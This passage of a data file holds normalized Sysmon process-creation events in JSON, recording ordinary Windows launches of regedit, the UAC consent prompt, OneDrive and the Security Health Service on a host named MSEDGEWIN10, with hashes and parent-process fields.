"object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:08.560Z", "type": "raw", "uuid": "69b82445-374f-4bda-b188-506981bd842e"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:26.2613819Z\"},\"EventRecordID\":\"28072\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:26.252\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7aa-5ea4-0000-001066001700}\"},{\"Name\":\"ProcessId\",\"text\":\"4480\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\regedit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.168 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Registry Editor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"REGEDIT.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\regedit.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00206cd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d36c\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1D72449F04F2287A31A91024FC3E3ADA33322E72,MD5=A3668018735B59050AD123A5A8CDC184,SHA256=FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152,IMPHASH=7FEBF576192E34BDF7D07877CBACC413\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00206cd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "119660", "object.process.cmdline": "\"C:\\Windows\\regedit.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\regedit.exe", "object.process.guid": "747f3d96-b7aa-5ea4-0000-001066001700", "object.process.hash.imphash": "7FEBF576192E34BDF7D07877CBACC413", "object.process.hash.md5": "A3668018735B59050AD123A5A8CDC184", "object.process.hash.sha1": "1D72449F04F2287A31A91024FC3E3ADA33322E72", "object.process.hash.sha256": "FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152", "object.process.id": "4480", "object.process.meta": "Description:Registry Editor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "regedit.exe", "object.process.original_name": "REGEDIT.EXE", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\", "object.process.version": "10.0.17763.168 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "119660", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:26.252Z", "type": "raw", "uuid": "72682623-a260-4018-b7a3-d5e3d0d33916"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:21.2632329Z\"},\"EventRecordID\":\"28050\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:21.230\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a5-5ea4-0000-0010eab91300}\"},{\"Name\":\"ProcessId\",\"text\":\"7036\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.404 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"consent.exe\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 6964 258 0000021FF266EC20\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b776-5ea4-0000-0010a74d0b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6964\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 6964 258 0000021FF266EC20", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-b7a5-5ea4-0000-0010eab91300", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7036", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b776-5ea4-0000-0010a74d0b00", "object.process.parent.id": "6964", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.404 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:21.230Z", "type": "raw", "uuid": "e1865ecf-8d34-4c85-9bea-9f40349bf60f"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:21.2513938Z\"},\"EventRecordID\":\"28049\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:21.199\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a5-5ea4-0000-0010cab51300}\"},{\"Name\":\"ProcessId\",\"text\":\"3256\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\regedit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.168 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Registry Editor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"REGEDIT.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\regedit.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1D72449F04F2287A31A91024FC3E3ADA33322E72,MD5=A3668018735B59050AD123A5A8CDC184,SHA256=FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152,IMPHASH=7FEBF576192E34BDF7D07877CBACC413\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Windows\\regedit.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\regedit.exe", "object.process.guid": "747f3d96-b7a5-5ea4-0000-0010cab51300", "object.process.hash.imphash": "7FEBF576192E34BDF7D07877CBACC413", "object.process.hash.md5": "A3668018735B59050AD123A5A8CDC184", "object.process.hash.sha1": "1D72449F04F2287A31A91024FC3E3ADA33322E72", "object.process.hash.sha256": "FF3B56204F0CEA172AEFB178E05A32C3C3C0BE93F29DD4C2DF46A6DE07BB5152", "object.process.id": "3256", "object.process.meta": "Description:Registry Editor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "regedit.exe", "object.process.original_name": "REGEDIT.EXE", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\", "object.process.version": "10.0.17763.168 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:21.199Z", "type": "raw", "uuid": "e8f934b6-263b-47d6-b2aa-021cb2b2b0fb"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:18.9751995Z\"},\"EventRecordID\":\"28043\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:18.928\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a2-5ea4-0000-0010982f1200}\"},{\"Name\":\"ProcessId\",\"text\":\"864\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\"},{\"Name\":\"FileVersion\",\"text\":\"19.232.1124.0012\"},{\"Name\":\"Description\",\"text\":\"Microsoft OneDrive\"},{\"Name\":\"Product\",\"text\":\"Microsoft OneDrive\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"OneDrive.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=C58446B3ABB7047BE3A581CCFD76329261BD5B9F,MD5=A82BFD1BBA73F453B27F146930AA8256,SHA256=6048931C40EFE6B73A6A541678D866E82C9ABEBA780FA61EB934AF124FB8F1BC,IMPHASH=67FA439780BDB54E74C4FA7BF8E5F089\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4600\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "\"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\onedrive.exe", "object.process.guid": "747f3d96-b7a2-5ea4-0000-0010982f1200", "object.process.hash.imphash": "67FA439780BDB54E74C4FA7BF8E5F089", "object.process.hash.md5": "A82BFD1BBA73F453B27F146930AA8256", "object.process.hash.sha1": "C58446B3ABB7047BE3A581CCFD76329261BD5B9F", "object.process.hash.sha256": "6048931C40EFE6B73A6A541678D866E82C9ABEBA780FA61EB934AF124FB8F1BC", "object.process.id": "864", "object.process.meta": "Description:Microsoft OneDrive | Product:Microsoft OneDrive | Company:Microsoft Corporation", "object.process.name": "onedrive.exe", "object.process.original_name": "OneDrive.exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.parent.id": "4600", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\", "object.process.version": "19.232.1124.0012", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:18.928Z", "type": "raw", "uuid": "5e45d100-028f-46a5-b2f7-75bf9f0745d5"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:16.9653442Z\"},\"EventRecordID\":\"27999\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:16.938\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a0-5ea4-0000-00108d131100}\"},{\"Name\":\"ProcessId\",\"text\":\"3376\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\19.232.1124.0012\\\\FileCoAuth.exe\"},{\"Name\":\"FileVersion\",\"text\":\"19.232.1124.0012\"},{\"Name\":\"Description\",\"text\":\"Microsoft OneDriveFile Co-Authoring Executable\"},{\"Name\":\"Product\",\"text\":\"Microsoft OneDrive\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"FileCoAuth.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\19.232.1124.0012\\\\FileCoAuth.exe -Embedding\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=61E5471B3D1B1FCF6D7ACAACB16E20AC759A6382,MD5=69FBC6D5F49A65860266E17018C55429,SHA256=BF5DD8456747FBA334FE22A5AA4BCC88B61BFBC7D5AC7990CC271C447DEB3409,IMPHASH=7AFCE357D7EB35125ABAE0BB8AB443EC\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010fe6f0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"808\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\OneDrive\\19.232.1124.0012\\FileCoAuth.exe -Embedding", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\19.232.1124.0012\\filecoauth.exe", "object.process.guid": "747f3d96-b7a0-5ea4-0000-00108d131100", "object.process.hash.imphash": "7AFCE357D7EB35125ABAE0BB8AB443EC", "object.process.hash.md5": "69FBC6D5F49A65860266E17018C55429", "object.process.hash.sha1": "61E5471B3D1B1FCF6D7ACAACB16E20AC759A6382", "object.process.hash.sha256": "BF5DD8456747FBA334FE22A5AA4BCC88B61BFBC7D5AC7990CC271C447DEB3409", "object.process.id": "3376", "object.process.meta": "Description:Microsoft OneDriveFile Co-Authoring Executable | Product:Microsoft OneDrive | Company:Microsoft Corporation", "object.process.name": "filecoauth.exe", "object.process.original_name": "FileCoAuth.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010fe6f0000", "object.process.parent.id": "808", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\appdata\\local\\microsoft\\onedrive\\19.232.1124.0012\\", "object.process.version": "19.232.1124.0012", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:20:16.938Z", "type": "raw", "uuid": "02016029-4572-4cd6-b76c-72ffa30a97d3"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:20:16.1654826Z\"},\"EventRecordID\":\"27991\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:20:16.141\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7a0-5ea4-0000-001027d81000}\"},{\"Name\":\"ProcessId\",\"text\":\"7088\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\SecurityHealthService.exe\"},{\"Name\":\"FileVersion\",\"text\":\"4.18.1807.16384 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Security Health Service\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 